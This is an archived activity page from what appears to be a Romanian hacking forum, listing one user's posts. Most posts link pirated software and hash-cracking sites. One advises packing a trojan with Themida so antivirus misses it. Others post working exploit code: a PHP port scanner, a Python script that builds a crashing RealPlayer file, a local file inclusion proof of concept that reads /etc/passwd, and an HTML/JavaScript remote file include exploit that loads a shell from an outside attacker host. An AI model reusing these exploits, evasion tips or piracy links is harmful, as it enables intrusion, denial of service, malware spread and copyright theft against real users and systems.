Jump to content

Ras

Active Members
  • Posts

    1106
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by Ras

  1. virusz ... iti dau 2 link-uri http://flmsdown.net/2007/04/25/ultimate_zip_cracker_v7320.html http://dl.phazeddl.com/807592/Ultimate_Zip_Cracker_V7.3.2.0/TSBay.org aici sunt 2 descriptii pt program...eu am pus 1 din ele
  2. cand ai pus acolo adminul zerohack-ului... am crezut ca esti zero-x... parca am avut asazukiro prin lista... pana la urma ce nick aveai pe dc++ ?
  3. welcome... au fost ceva certuri si intre mine si zero-x ... asa iti ziceai atunci. cred ca torent team iti aduce aminte de tot... oricum pace...
  4. The XSS Impersonation Attack Author: SlicK Date: 1 May 2007 bv slick god job!
  5. nu dai click dreapta si modify... dai click dreapta dupaia new dword value, apoi ii pui numele name:plural, si dupaia ii pui value 10.
  6. Ras

    Computer music

    programul ala e amplu si ff greu cat despre melodia aia din anii '70 ... suna destul de bine pt timpul ala.
  7. Your Uninstaller PRO 2006 5.0.0.358 Your Uninstaller! uninstaller program is the industry's leading uninstaller program. It's the world's 1st smart Drag & Uninstall™ uninstaller program under the Windows platform, it's Windows XP Optimized and also works on other Windows versions including Windows XP/2000/ME/98/95/2003/Vista. It's as easy as using the recycle bin. Imagine! Just a drag-drop and the program you don't want will disappear from your computer-- as well as everything the unwanted program brings! Your Uninstaller! is a user-friendly way of removing unneeded applications on your computer. It can even remove some annoying spywares! Your Uninstaller! software is a specially designed uninstaller program for both beginning and advanced users. Your Uninstaller! 2006 is extremely very fast and easy to use. It has a unique ability to uninstall items by simply dragging programs' icons into the Your Uninstaller! icon. You may also find the application you want to uninstall through a unique search function. Your Uninstaller! completely removes applications so quickly. Your Uninstaller! starts up 500%-1000% times faster than other Add/Remove programs. As you know, there are many installers in the world, such as InstallShield, Wise Installer, Microsoft Installer and many others. Most applications are built using these installers. Each installer has a unique install database, which makes it difficult to find all the changes programs' make to your computer. That's why other uninstallers can only uninstall part of an application-leaving some files and registry keys. To solve this problem, Your Uninstaller! uses it's unique technique: SmartUninstall™. SmartUninstall™ has a database containing information about all installers on the market; so when it uninstalls a program, it automatically detects which installer the application used, then it simply uninstalls the application properly. That's the reason Your Uninstaller! can detect and completely remove all the programs and icons on your computer. Key features: * Completely remove any application installed. * Deep scan of registry and entire disk for unused registry entries and files. * Remove programs that could not be removed by Add/Remove Program. * Uninstall screen savers. * Shows all applications installed on your computer with customized views. Built-in Disk Cleaner helps you find and remove unnecessary files on your disk to save space and make computer faster! * Built-in IE Context Menu Cleaner, cleans the context menu of Internet Explorer. * Built-in Startup Manager, take full control of Window startups. * Built-in Start Menu Manager helps you keep your Start Menu clean. * Get the applications detail info even if it hide itself in deep directory, especially useful for finding out "Spy" applications. * Backup/restore installed-applications information. * Uninstall with SINGLE drag-drop! Just drop a file on Your Uninstaller! icon on the desktop to see what happens! * List installed applications with appropriate icons(same as you see in the Start Menu), you can easily find the application you want to uninstall. * Powerful search feature allows you quickly find the program you are about to uninstall. * Automatical detectection of invalid installations and removing them with one click. * Force removal of uninstall related entries in the registry(care to use!). * Lighting speed at startup, 5-10 times faster than Add/Remove Program of Windows XP! * View all details of an certain application installed on your computer. * Export programs list to file or printer. * More ... Here's a brief new features list: - Uninstall programs that can't be uninstalled through Add/Remove Program. - Advanced Uninstall to solve "prevent-reinstall" problems. - Cache support for fast access to all programs. - Know more about each program installed on your computer. - Quick access to various install locations. - Deep system scan after uninstallation to find hidden registry entries. - Customized color for each type of programs. - Load undocumented startup programs in Startup Manager, it's easy to find some spywares. - Newly added Start Menu Manager keeps Start Menu always clean. - Improved Disk Cleaner provides more options and faster speed. - Wizard style uninstallation process keeps Your Uninstaller! 2006 easy to use. - Redesigned user interface. - Improved Drag&Uninstall. - More options added for advanced users. - Other many minor improvements and changes. Download: http://rapidshare.com/files/28904687/Your_Uninstaller_PRO_2006_5.0.0.358.rar
  8. Ras

    Cracking Sites

    http://www.md5lookup.com/ http://md5.rednoize.com http://nz.md5.crysm.net http://us.md5.crysm.net http://www.xmd5.org http://gdataonline.com http://www.hashchecker.com http://passcracking.ru http://www.milw0rm.com/md5 http://plain-text.info http://www.securitystats.com/tools/hashcrack.php http://www.schwett.com/md5/ http://passcrack.spb.ru/ http://shm.pl/md5/ http://www.und0it.com/ http://www.neeao.com/md5/ http://md5.benramsey.com/ http://www.md5decrypt.com/ http://md5.khrone.pl/ http://www.csthis.com/md5/index.php http://www.securitystats.com/tools/hashcrack.php http://www.md5decrypter.com/ http://www.md5encryption.com/ http://www.md5database.net/ http://md5.xpzone.de/ http://www.milw0rm.com/md5/info.php http://md5.geeks.li/ http://www.hashreverse.com/ http://www.cmd5.com/english.aspx http://www.md5.altervista.org/ http://md5.overclock.ch/biz/index.php?p=md5crack&l=en http://alimamed.pp.ru/md5/ http://md5crack.it-helpnet.de/index.php?op=add http://cijfer.hua.fi/ http://shm.hard-core.pl/md5/ http://www.mmkey.com/md5/HOME.ASP http://www.thepanicroom.org/index.php?view=cracker http://rainbowtables.net/services/results.php http://rainbowcrack.com/ http://www.securitydb.org/cracker/ http://passwordsecuritycenter.com/in...roducts_ http://0ptix.co.nr/md5 https://www.astalavista.net/?cmd=rainbowtables http://ice.breaker.free.fr/ http://www.md5this.com http://www.shalookup.com/
  9. The amazing Passwocular shows you the password hidden below the asterisks! Sometimes you may to have a password you entered years before. It's impossible to recollect this password especially if the password was given by your service provider. Passwocular can help! Try Passwocular! Just click 'Scan' and Passwocular will get your password - Instantly!!! The Passwocular will also show the passwords in the Internet Explorer windows. System requirements: Windows 95/98/2000/XP/Vista. Download: http://rapidshare.com/files/28898252/Ultimate.ZIP.Cracker.v7.3.2.0.rar
  10. /*------------------------------------------------------------------------- |scan.php by pr0cess |for fun! |Mail:l4ndishezhang@hotmail.com -------------------------------------------------------------------------*/ <html> <STYLE type=text/css> BODY { SCROLLBAR-FACE-COLOR: #000000; FONT-SIZE: 12px; SCROLLBAR-HIGHLIGHT-COLOR: #FFFFFF; SCROLLBAR-SHADOW-COLOR: #FFFFFF; SCROLLBAR-3DLIGHT-COLOR: #000000; SCROLLBAR-ARROW-COLOR: #000000; SCROLLBAR-TRACK-COLOR: #000000; FONT-FAMILY: verdana; SCROLLBAR-DARKSHADOW-COLOR: #000000 } INPUT { BORDER-TOP-WIDTH: 1px; FONT-WEIGHT: bold; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 10px; BORDER-LEFT-COLOR: #008000; BACKGROUND: #004000; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #008000; COLOR: #00ff00; BORDER-TOP-COLOR: #008000; FONT-FAMILY: verdana; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #008000 } TEXTAREA { BORDER-TOP-WIDTH: 1px; FONT-WEIGHT: bold; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 10px; BORDER-LEFT-COLOR: #008000; BACKGROUND: #004000; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #008000; COLOR: #00ff00; BORDER-TOP-COLOR: #008000; FONT-FAMILY: verdana; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #008000 } table{ BORDER-BOTTOM: #FFFFFF 1px DASHED; BORDER-TOP: #FFFFFF 1px DASHED; BORDER-LEFT: #FFFFFF 1px DASHED; BORDER-RIGHT: #FFFFFF 1px DASHED; } A:link { TEXT-DECORATION: none } A:visited { TEXT-DECORATION: none } A:active { TEXT-DECORATION: none } A:hover { COLOR: #00ff00; TEXT-DECORATION: none } B.h6 { FONT-WEIGHT: bold } B.h7 { FONT-WEIGHT: bold; FONT-STYLE: italic } </STYLE> <BODY dir=ltr text=#FFFFFF vLink=#FFFFFF aLink=#FFFFFF link=#FFFFFF bgColor=#CCCCCC >|by pr0cess| $ports="20,21,22,23,25,80,110,137,138,139,143,156,443,445,1433,3306,3389,4899,8080"; <? function getmicrotime(){ list($usec, $sec) = explode(" ",microtime()); return ((float)$usec + (float)$sec); } $time_start = getmicrotime(); echo "<form action=\"\" method=\"post\"> RemoteIP: <input type=\"text\" name=\"ip\"><input type=\"submit\" value=\"Scan\">"; echo " "; $ip=$_POST['ip']; $ports="20,21,22,23,25,80,110,137,138,139,143,156,443,445,1433,3306,3389,4899,8080"; if (isset($ip)){ echo "Scanning....."; echo " "; foreach(explode(",","$ports") as $port) { if ( is_numeric($port) ) { $fp = @fsockopen($ip,$port,$errno,$errstr,5); if(!$fp) { echo "Port: $port --><font color=\"white\"> Close</font>"; echo " "; } else { echo "Port: $port --><font color=\"red\"> Open</font>"; echo " "; @fclose($fp); } flush(); } } } $time_end = getmicrotime(); $time = number_format(($time_end - $time_start),6); echo "-----------------------------------------------------------------------------"; echo " "; echo "Processed in $time second[s]"; ?> </body> </html>
  11. Lesson 01 - Being a Hacker Lesson 02 - Windows and Linux Lesson 03 - Ports and Protocols Lesson 04 - Services and Connections Lesson 05 - System Identification Lesson 06 - Malware (Viruses, Trojans, etc.) Lesson 07 - Attack Analysis Lesson 08 - Digital Forensics Lesson 09 - E-mail Security and Privacy Lesson 10 - Web Security and Privacy Lesson 11 - Passwords Lesson 12 - Internet Legalities and Ethics Download: http://rapidshare.com/files/28896338/hacker_highschool.rar
  12. Ras

    RST

    nu stiam ca sunt mai multe... credeam ca este decat cel nou mi-am pus stilul vechi
  13. pai incearca sa criptezi serverul de la trojanul asta cu themida si il face nedetectabil.
  14. Ras

    user avatar

    un avatar cu Ras ... daca se poate
  15. pacat ca e detectabil.
  16. Ras

    RST

    mai bine pune stilul ala vechi de rst...
  17. Ras

    RST

    vedeti ca butonul edit si butonul quote sunt il alta limba... daca puteti modificati
  18. WinTools.net Professional 8.4.1 WinTools.net is a suite of utilities for increasing your operating system's performance. WinTools.net cleanly removes unwanted software from disk drives and dead references from the Windows registry. WinTools.net puts you in control of the Windows start up process, memory monitoring and gives you the power to customize desktop and system settings to fit your needs. WinTools.net: Clean Uninstaller When you uninstall different software, temporary files and files not deleted in the process of uninstallation often remain on the hard disk. These files are no longer used, they take up disk space and increase disk access times. With the help of the tool "Clean Uninstaller" you can solve that problem. You can also control the installation process of program, monitor installed files and changes made to the Windows registry system files during installation. WinTools.net: Scan Files When different programs are running, temporary files necessary for the proper functioning those programs are created on hard disk. Quite often these temporary files are not deleted. The temporary files remain on hard disk, occupy the space and sometimes slowing the work of your computer. The tool "Scan Files" is used for periodic cleaning of the computer of temporary and unused files. WinTools.net: Scan Registry Many programs store information about themselves in the Windows registry; these programs add new file extension associations and install components of their own. Far too often, the unistallation methods used by these programs fail to remove their information from the registry adding unnecessary bloat. After several series of installation/uninstallation, the Windows registry becomes bigger and bigger; computer power declines and program access times increase. The "Scan Registry" tool serves for periodic cleaning of the registry and for correcting incorrect registry records. WinTools.net: StartUp Manager Many programs "consider" themselves the most important programs in a system: they place themselves in startup and in a System Tray of a system. This leads to unreasonable using of system resources, of random access memory; and finally, to reducing processor power. As a rule, such programs write information about themselves not in the Start section of the "Startup" menu, but in the Windows registry without leaving the option to the user and complicating the process of checking the autothread process. The "Start Up" tool monitors all records about autothread and allows to delete/add and temporarily disable records. WinTools.net: Tweak UI A set of additional adjustments related to safety, system capacity and user preferences. Adjustments are divided into six groups:
  19. Avast! Anti-Virus Professional Edition 4.7.9976 avast! 4 Professional Edition is a collection of high-end technologies that work in perfect synergy, having one common goal: to give you the top grade protection against computer viruses. It represents an ideal solution for any Windows-based workstation. avast! 4 Professional Edition is a complete ICSA certified antivirus software for your company. It obtained VB100% awards in 2002/4 Virus Bulletin comparative reviews. avast! scans for viruses, worms and Trojans: On Demand - with two User Interfaces, On Access, E-mail, during Boot Time, in File Explorer and Screen Saver. It maintains Virus Chest. Protects E-mail, HTTP, NNTP, ICQ, mIRC, Kazaa etc. True incremental updates based on iAVS technology updates twice a week virus definition file. avast! Home/Professional now fully supports the 64-bit Windows platform. Features: - Antivirus kernel - Simple User Interface - Enhanced User Interface - Resident protection - Script Blocker (Professional Edition only - P2P and IM Shields - Network Shield - Web Shield - Automatic updates - PUSH updates - Virus Chest - System integration - Command-line scanner - Integrated Virus Cleaner - Support for 64-bit Windows - Internationalization Download: http://rapidshare.com/files/28757671/Avast__AV_4.7.9976.rar
  20. #!/usr/bin/python ### #*Real player 10 Gold .Ra file remote Dos. #Credits to n00b for finding this bug #This bug is a nasty memory leak with in #Real player 10 gold please remember if #your guna test it out save all your info #you need first..Coz your probly guna have #to reboot also remember all other applications #will be deprived of page memory so other #applications might fail upon execution ### #Tested: On win xp sp 1 / sp 2. ################################################################################ #Pf usage will go from around 120mb-1.40gb #I've provided the following debug info also #What i could collect from the crash dump.. #No vital memory address where over written #Just a nasty memory leak. ################################################################################ #Executable search path is: #Windows XP Version 2600 (Service Pack 2) UP Free x86 compatible #Product: WinNt, suite: SingleUserTS Personal #Debug session time: Sun Apr 29 13:45:27.000 2007 (GMT-7) #System Uptime: 0 days 0:47:42.649 #Process Uptime: 0 days 0:01:39.000 ################################################################################ #This dump file has an exception of interest stored in it. #The stored exception information can be accessed via .ecxr. #(420.4a0): Access violation - code c0000005 (first/second chance not available) #eax=00000001 ebx=00000000 ecx=00000000 edx=00780764 esi=00785110 edi=6334def8 #eip=632164b5 esp=0012ddc8 ebp=0012dfdc iopl=0 nv up ei pl zr na pe nc #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246 #rput3260+0x64b5: #632164b5 8b11 mov edx,dword ptr [ecx] ds:0023:00000000=???????? ################################################################################ #Seams like another memory leak in real-player 10 gold fully patched. #Im not relying on the debug-info as i had to reboot at crash time #Vist us at [url]http://blackhat-forums.com/[/url]. ################################################################################ import sys import struct import time print"#########################################################################" print" n00b is credited for find this bug and writing poc. " print"#########################################################################" print"# Real player 10 gold .Ra file dos exploit #" print"# Shouts to every one at milw0rm #" print"# ======================= #" print"# Date :Aprill 29 2007 #" print"# #" print"# Shouts to marsu your doing a excellent job #" print"#########################################################################" print"" print"Special thanks to str0ke" print"" print"Please wait your file is being created" time.sleep (2.0) ################################################################################ Main_Header = "\x2e\x52\x4d\x46\x00\x00\x00\x12\x00\x01\x00\x00\x00\x00\x00\x00" Main_Header += "\x00\x06\x50\x52\x4f\x50\x00\x00\x00\x32\x00\x00\x00\x00\xfa\x53" Main_Header += "\x00\x00\xfa\x53\x00\x00\x02\xe8\x00\x00\x02\xe8\x00\x00\x00\x3c" Main_Header += "\x00\x00\x10\xe4\x00\x00\x07\x41\x00\x00\xb3\xee\x00\x00\x02\xac" Main_Header += "\x00\x02\x00\x0d\x0a\x4d\x44\x50\x52\x00\x00\x00\xa4\x00\x00\x00" Main_Header += "\x00\x00\x00\xfa\x53\x00\x00\xfa\x53\x00\x00\x02\xe8\x00\x00\x02" Main_Header += "\xe8\x00\x00\x00\x00\x00\x00\x07\x41\x00\x00\x15\xfd\x0c\x41\x75" Main_Header += "\x64\x69\x6f\x20\x53\x74\x72\x65\x61\x6d\x14\x61\x75\x64\x69\x6f" Main_Header += "\x2f\x78\x2d\x70\x6e\x2d\x72\x65\x61\x6c\x61\x75\x64\x69\x6f\x00" Main_Header += "\x00\x00\x56\x2e\x72\x61\xfd\x00\x05\x00\x00\x2e\x72\x61\x35\x66" Main_Header += "\x05\x63\xd7\x00\x05\x00\x00\x00\x46\x00\x0e\x00\x00\x02\xe8\x00" Main_Header += "\x00\xae\x60\x00\x07\x55\x6d\x00\x00\x00\x00\x00\x14\x02\xe8\x00" Main_Header += "\xba\x00\x00\x00\x00\xac\x44\x00\x00\xac\x44\x00\x00\x00\x10\x00" ################################################################################ Mid_Header = "\x01\x67\x65\x6e\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" Mid_Header += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" Mid_Header += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" Mid_Header += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x00\x00\x00\x00" Mid_Header += "\x00\x62\x1f\xc1\x42\x37\xc5\x7f\xd8\xaa\x9b\x59\x89\x0d\x91\xbb" Mid_Header += "\xcd\x29\x32\xb4\xb0\xd9\x30\x0f\x05\x08\x5e\x2b\x3f\x60\x23\x43" Mid_Header += "\xe2\xf3\x82\x96\x81\xfe\xa4\x83\x8e\x2b\x32\x09\x1a\x21\x1e\xc9" Mid_Header += "\x8d\x00\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" ################################################################################ Junk_Header = "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" Junk_Header += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" Junk_Header += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" Junk_Header += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" Junk_Header += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" Junk_Header += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" Junk_Header += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" Junk_Header += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" Junk_Header += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" Junk_Header += "\x41\x41\x00\x37\xc5\x11\xf2\x37\xc5\x11\xf2\x37\xc5\x11\xf2\x37" ################################################################################ Tail_Header = "\xc5\x49\x4e\x44\x58\x00\x00\x00\x3e\x00\x00\x00\x00\x00\x03\x00" Tail_Header += "\x00\x00\x00\xb4\x2c\x00\x00\x00\x00\x00\x5c\x00\x00\x02\xbe\x00" Tail_Header += "\x00\x00\x00\x00\x00\x00\x00\x07\x8c\x00\x00\x3d\xce\x00\x00\x00" Tail_Header += "\x14\x00\x00\x00\x00\x0e\xbc\x00\x00\x78\xde\x00\x00\x00\x28\x49" Tail_Header += "\x4e\x44\x58\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x01\x00" Tail_Header += "\x00\x00\x00\x00" n00b_file = open("Realplayerdos.ra","wb") n00b_file.write(Main_Header) time.sleep (1.0) n00b_file.write(Mid_Header) time.sleep (1.0) n00b_file.write(Junk_Header) time.sleep (1.0) n00b_file.write(Tail_Header) n00b_file.close() print"File was created." # milw0rm.com [2007-04-30]
  21. \#'#/ (-.-) --------------------oOO---(_)---OOo------------------- | Imageview v5.3 (fileview.php) Local File Inclusion | | (works only with magic_quotes_gpc = off) | | coded by DNX | ------------------------------------------------------ [!] Discovered: DNX [!] Vendor: [url]www.blackdot.be/?inc=projects/imageview[/url] [!] Detected: 21.04.2007 [!] Reported: 21.04.2007 [!] Remote: yes [!] Background: Imageview is an image gallery script based on PHP [!] Bug: $_GET['album'] in fileview.php line 4 require('albums/'.$_GET['album'].'/data.dat'); [!] PoC: - [url]http://[site]/[/url][path]/fileview.php?album=[file]%00 - [url]http://[site]/[/url][path]/fileview.php?album=../../../../../../etc/passwd%00 [!] Solution: Install Imageview 6 or magic_quotes_gpc = on # milw0rm.com [2007-04-29]
  22. <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <title>2005-2006 The Merchant Project Remote File Include Exploit</title> <script language="JavaScript"> //'=============================================================================================== //'[Script Name: 2005-2006 The Merchant Project //'[Coded by : kezzap66345 //'[Author : kezzap66345 //'[Contact : [email]kezzap66345@hotmail.com[/email] //'[S.Page : [url]http://www.the-merchant.co.uk/[/url] //'[$$ : Free //'[Dork : [url]http://www.google.com.tr/search?q=%22The+Merchant+Project%22&hl=tr&start=30&sa=N[/url] //'[Download : [url]http://sourceforge.net/project/downloading.php?group_id=37721&use_mirror=belnet&filename=themerchant-2.2.tar.bz2&58090119[/url] //'=============================================================================================== //Basic exploit,but any time : ( var path="/help" var adres="/index.php?" //File name var acik ="show=" // Line x var shell="http://kezzap66345.by.ru/casus.php?" // Shell Script function command(){ if (document.rfi.target1.value==""){ alert("Failed.."); return false; } rfi.action= document.rfi.target1.value+path+adres+acik+shell; rfi.submit(); // Form Submit } </script> </head> <body bgcolor="#000000"> <center> [b]<font face="Verdana" size="2" color="#008000">2005-2006 The Merchant Project Remote File Include Exploit</font>[/b]</p> </p> <form method="post" target="getting" name="rfi" onSubmit="command();"> [b]<font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[[url]http://[target]/[/url][scriptpath]</font><font color="#00FF00" size="2" face="Arial"> </font><font color="#FF0000" size="2"></font>[/b] <input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"></p> <input type="submit" value="Gonder" name="B1"><input type="reset" value="Sifirla" name="B2"></p> </form> <iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe> </p> [b]<font face="Verdana" size="2" color="#008000">kezzap66345</font>[/b]</p> </center> </body> </html>
  23. SUPER AntiSpyware Professional 3.7.0.1018 SUPERAntiSpyware is the most thorough scanner on the market. Our Multi-Dimensional Scanning and Process Interrogation Technology will detect spyware that other products miss! SUPERAntiSpyware will remove ALL the Spyware, NOT just the easy ones! Quick, Complete and Custom Scanning of Hard Drives, Removable Drives, Memory, Registry, Individual Folders and More! Includes Trusting Items and Excluding Folders for complete customization of scanning! Detect and Remove Spyware, Adware, Malware, Trojans, Dialers, Worms, KeyLoggers, HiJackers, Parasites, Rootkits and many other types of threats. Light on System Resources and won't slow down your computer like many other anti-spyware products. Won't conflict with your existing anti-spyware or anti-virus solution! Repair broken Internet Connections, Desktops, Registry Editing and more with our unique Repair System! Real-Time Blocking of threats! Prevent potentially harmful software from installing or re-installing!* Multi-Dimensional Scanning detects existing threats as well as threats of the future by analyzing threat characteristics in addition to code patterns. First Chance Prevention examines over 50 critical points of your system each time your system starts up and shuts down to eliminate threats before they have a chance to infect and infiltrate your system. Process Interrogation Technology allows threats to be detected no matter where they are hiding on your system. Schedule either Quick, Complete or Custom Scans Daily or Weekly to ensure your computer is free from harmful software.* Dedicated Threat Research Team scours the web for new threats and provides daily definition updates. Download: http://rapidshare.com/files/28707713/SUPER_AntiSpyware_Professional_3.7.0.1018.rar
  24. DVDFab Platinum 3.1.0.5 Beta DVDFab Platinum is all you need to backup DVDs. DVDFab Platinum 3 is brand new, is completely rewritten, is based on 5 years of DVD copy software development. DVDFab is simply the easiest way to copy a DVD movie. Just insert the movie and a blank DVD then press Start. Your entire movie - including menus, trailers and special features - is copied to a single DVD with just one click, and everything happens automatically. Backup your entire DVD - including menus, trailers, and special features - onto one or multiple discs. Download: http://rapidshare.com/files/28707060/DVDFab_Platinum_3.1.0.5_Beta.rar
  25. XP To Vista Ultimate This is the ultimate XP To Vista transformation pack. Forget Windows Xp, this is far better than any of them put together. The XP To Vista constists to of different programs that will make your XP computer look like Vista. Download: http://rapidshare.com/files/28706713/XP-TO-VISTA.rar
×
×
  • Create New...